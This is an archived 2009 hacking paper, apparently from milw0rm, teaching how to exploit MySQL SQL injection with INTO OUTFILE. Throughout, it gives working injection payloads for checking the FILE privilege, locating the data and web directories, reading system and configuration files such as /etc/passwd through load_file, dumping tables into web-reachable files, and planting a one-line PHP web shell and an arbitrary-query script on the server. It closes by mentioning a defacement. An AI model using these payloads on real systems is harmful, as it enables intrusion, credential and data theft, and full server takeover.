Archived security papers and articles in various languages.
o00000000000000000000000000000000000000000000000000000o [!] Paper about: 8 .o8 8 INTO OUTFILE (Mysql) 8 "888 8 [!] Athor: xados 8 oooo ooo .oooo. .oooo888 .ooooo. .oooo.o 8 [!] Contact: 8 `88b..8P' `P )88b d88' `888 d88' `88b d88( "8 8 email@example.com 8 Y888' .oP"888 888 888 888 888 `"Y88b. 8 [!] Thnaks to: 8 .o8"'88b d8( 888 888 888 888 888 o. )88b 8 Johannes Dahse 8 o88' 888o `Y888""8o `Y8bod88P" `Y8bod8P' 8""888P' 8 becouse this 8 8 paper is from 8 8 his mind. o00000000000000000000000000000000000000000000000000000o ~ ~ ~ [+1] The FILE privilege If we want to read or write to files we have to have the FILE privilege. First see wich user we are in db with code: 0â€² UNION SELECT current_user,null /* you can put current_user or user() or system_user This will give us the username@server. //(normally ..@localhost) * You can also use the following blind SQL injections query, but it's very booring.. : Guess a name: 1â€² AND user() LIKE â€˜root Brute the name letter by letter: 1â€² AND MID((user()),1,1)>â€™m 1â€² AND MID((user()),2,1)>â€™m 1â€² AND MID((user()),3,1)>â€™m ecc... Now we must acces to mysql.user so.. 0â€² UNION SELECT 1,2,3,file_priv,4 FROM mysql.user WHERE user = â€˜username for username we put the name of current_user. You can also have a look at the whole mysql.user table without the WHERE clause, but I chose this way because you can easily adapt the injection for blind SQL injection: 1â€² AND MID((SELECT file_priv FROM mysql.user WHERE user = â€˜usernameâ€™),1,1) = â€˜Y Naturally, this it's a blind so yuo can't write 1,2,3.. becouse it's not a union select. (but it's subselects ) You can also recieve the FILE privilege info from the information.schema table on MySQL 5: 0â€² UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = â€˜fileâ€™ AND grantee like â€˜%username% Like IN blind sqli: 1â€² AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = â€˜fileâ€™ AND grantee like â€˜%username%â€™),1,1)=â€™Y [+2] The web directory problem Once we know if we can read/write files we have to check out the right path. In the most cases the MySQL server is running on the same machine as the webserver does and to access our files later we want to write them onto the web directory. If you define no path, INTO OUTFILE will write into the database directory. On MySQL 4 we can get an error message displaying the datadir: 0â€² UNION SELECT load_file(â€™a'),null/* On MySQL 5 we use: 0â€² UNION SELECT @@datadir,null/* The default path for file writing then is datadir\databasename. You can figure out the databasename with: 0â€² UNION SELECT database(),null/* Now these information are hard to get with blind SQL injection. But you donâ€™t need them necessarily. Just make sure you find out the web directory and use some ../ to jump back from the datadir. If you are lucky the script uses mysql_result(), mysql_free_result(), mysql_fetch_row() or similar functions and displays warning messages. Then you can easily find out the webserver directory by leaving those functions with no input that they will throw a warning message like: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /web/server/path/file.php on line xxx To provoke an error like this try something like: 0â€² AND 1=â€™0 or add some like param=1 This works at the most websites. If youâ€™re not lucky you have to guess the web directory or try to use load_file() to fetch files on the server which might help you. Here is a new list of possible locations for the Apache configuration file, which may spoil the webdirectory path: /etc/init.d/apache /etc/init.d/apache2 /etc/httpd/httpd.conf /etc/apache/apache.conf /etc/apache/httpd.conf /etc/apache2/apache2.conf /etc/apache2/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache/conf/httpd.conf /opt/apache/conf/httpd.conf /home/apache/httpd.conf /home/apache/conf/httpd.conf /etc/apache2/sites-available/default /etc/apache2/vhosts.d/default_vhost.include Check out the webservers name first by reading the header info and then figure out where it usually stores its configuration files. This also depends on the OS type (*nix/win) so you may want to check that out too. Use @@version or version() to find that out: 0â€² UNION SELECT @@version,null /* -nt-log at the end means itâ€™s a windows box, -log only means itâ€™s *nix box. Or take a look at the paths in error messages or at the header. Typical web directories to guess could be: /var/www/root/ /var/www/dbname/path/ /var/www/sitename/htdocs/ /var/www/localhost/htdocs .. Basically you should be allowed to write into any directory where the MySQL server has write access to, as long as you have the FILE privilege. However, an Administrator can limit the path for public write access. [+3] create useful files Once you figured out the right directory you can select data and write it into a file with: 0â€² UNION SELECT columnname,null FROM tablename INTO OUTFILE â€˜../../web/path/file.txt ( sometimes from mysql.user ) Or the whole data without knowing the table/column names: 1â€² OR 1=1 INTO OUTFILE â€˜../../web/path/file.txt If you want to avoid splitting chars between the data, use INTO DUMPFILE instead of INTO OUTFILE. You can also combine load_file() with into outfile, like putting a copy of a file to the accessable webspace: 0â€² AND 1=0 UNION SELECT load_file(â€™â€¦â€™) INTO OUTFILE â€˜â€¦ In some cases Iâ€™d recommend to use 0â€² AND 1=0 UNION SELECT hex(load_file(â€™â€¦â€™)) INTO OUTFILE â€˜â€¦ and decrypt it later with the PHP Charset Encoder, especially when reading the MySQL data files. Or you can write whatever you want into a file: 0â€² AND 1=0 UNION SELECT â€˜codeâ€™,null INTO OUTFILE â€˜../../web/server/dir/file.php Here are some useful code examples: A Normal code for a shell (PHP): <? system($_GET['lol']); ?> it's very important that the PHP safe_mode must be turned off!!. If is turned on maybe we can bypass symple with a hex converter: we can convert the code for bypass MAGIC_QUOTES_GPC filter. (normally yuo cans ee if hex_mode work with a load_file(pathinhex), like load_file(0x2f6574632f706173737764) for /etc/password (<= usually path) we can see a lot of informations about the webserver configuration with: <? phpinfo(); ?> // SQL QUERY <? ... $result = mysql_query($_GET['query']); ... ?> Try to use load_file() to get the database connection credentials, or try to include an existing file on the webserver which handles the mysql connect. REmember that the quotes are required and so if the error are like: error db near '\/www/root/path/page.php'\ maybe it's becouse the quotes are not allowed (with special filter used for anti-xss) So at the end: try and try and try. iT's 3.47 of night.. @.@ , now a marocco's hackers deface r00t.h4cky0u.org uff... this fuking priv8 exploit in bad hands :) so good night. ByEzzz xaDoS # milw0rm.com [2009-08-13]